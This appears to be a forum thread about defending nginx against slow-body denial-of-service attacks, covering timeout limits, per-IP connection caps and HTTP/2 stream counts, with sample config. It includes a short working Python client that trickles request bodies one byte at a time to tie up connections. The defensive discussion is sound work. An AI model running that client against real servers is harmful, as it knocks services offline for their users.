Conversation

We've had to start hardening our services against increasingly frequent Denial of Service (DoS) attacks. OVH provides DDoS mitigation, but this is a smaller-scale problem. Unfortunately, nginx lacks some important configuration options, and some others are specific to NGINX Plus.
Setting client_body_timeout to 15s won't time out a client sending 1 byte every 10s: the timeout only applies between successive reads, and there's no timeout for receiving the whole body. Only permitting tiny request bodies helps, but that isn't always an option. There's no way to time out based on a minimum transfer rate or even the total elapsed time.
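For reference, a minimal sketch of the directives in question (values are illustrative). client_body_timeout bounds only the gap between two successive reads, never the total transfer:

```nginx
server {
    # Only limits the interval between two successive reads of the
    # body; a client trickling 1 byte every 10s never exceeds it.
    client_body_timeout 15s;

    # Indirectly caps total transfer time, but only workable where
    # tiny request bodies are acceptable.
    client_max_body_size 16k;
}
```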
blog.cloudflare.com/the-curious-ca is a post about the interaction between send timeouts and buffering. It's not quite the same problem, and bufferbloat mitigations may partially address it. Still, it shows how this approach of timing out based on the time between system calls doesn't work well.
client_header_timeout covers the whole header portion, but the body following it has no comparable setting and appears to be what gets abused. We're using nginx's support for limiting connections right now, but we can't be very strict under normal conditions due to shared IPs.
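A sketch of the per-IP connection limiting being used here (zone name and numbers are illustrative); with shared IPs in play, the limit has to stay loose:

```nginx
http {
    # One shared-memory zone keyed by client address.
    limit_conn_zone $binary_remote_addr zone=peraddr:10m;

    server {
        # Covers the entire header section; the body has no equivalent.
        client_header_timeout 15s;

        # Deliberately generous: many legitimate users can share one IP.
        limit_conn peraddr 20;
    }
}
```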
Carrier-grade NAT, VPNs, etc. mean that many users can be behind a single IP. Also, HTTP/1.x opens a lot of connections for each user, while HTTP/2 multiplexes streams and can create a lot of concurrent work over a single connection, so nginx's limit treats each stream as a connection.
A user could use multiple browsers, etc., so there are plenty of ways of legitimately going over that limit. The HTTP/2 standard recommends permitting 100 concurrent streams by default, so a single HTTP/2 connection can trigger an enormous amount of work. A limit at the nginx layer is needed to deal with that.
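One mitigation along these lines, sketched under the assumption of a reasonably recent nginx (all values illustrative): lower the per-connection stream cap below the spec-recommended 100, and pair it with the connection limit, which nginx applies per stream:

```nginx
http {
    limit_conn_zone $binary_remote_addr zone=perip:10m;

    server {
        listen 443 ssl http2;

        # nginx's default is 128; the HTTP/2 spec suggests allowing at
        # least 100, so lowering this trades capacity for abuse resistance.
        http2_max_concurrent_streams 32;

        # nginx counts each HTTP/2 stream against this limit.
        limit_conn perip 40;
    }
}
```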
That doesn't help much, because it gets exhausted very slowly: a single byte written at a regular heartbeat is enough to keep each connection from timing out. Lowering the timeout forces the attacker to increase the heartbeat rate, but that doesn't really make much difference.
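The pattern being described can be sketched as a client (hypothetical helper, illustrative parameters) that declares a large body and then trickles one byte per heartbeat, staying just under the per-read timeout:

```python
import socket
import time

def slow_body(host, port=80, interval=10.0, total=1000):
    """Send a POST whose body arrives one byte per `interval` seconds.

    Each single-byte write resets a per-read timeout such as nginx's
    client_body_timeout, so the connection is held open for roughly
    interval * total seconds while occupying a connection slot.
    """
    s = socket.create_connection((host, port))
    s.sendall(b"POST / HTTP/1.1\r\n"
              b"Host: %b\r\n"
              b"Content-Length: %d\r\n\r\n" % (host.encode(), total))
    for _ in range(total):
        s.sendall(b"x")       # one byte per heartbeat
        time.sleep(interval)  # just below the server's per-read timeout
    s.close()
```

Lowering the server-side timeout only forces `interval` down; the attacker's cost per connection stays at one byte per heartbeat.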
The upstream server inherently has to do some CPU-bound work alongside reading from and writing to a database, so it needs a threaded server model and wouldn't be well suited to async. I need to choose the best available server for it and port to that, but I wouldn't expect a miracle.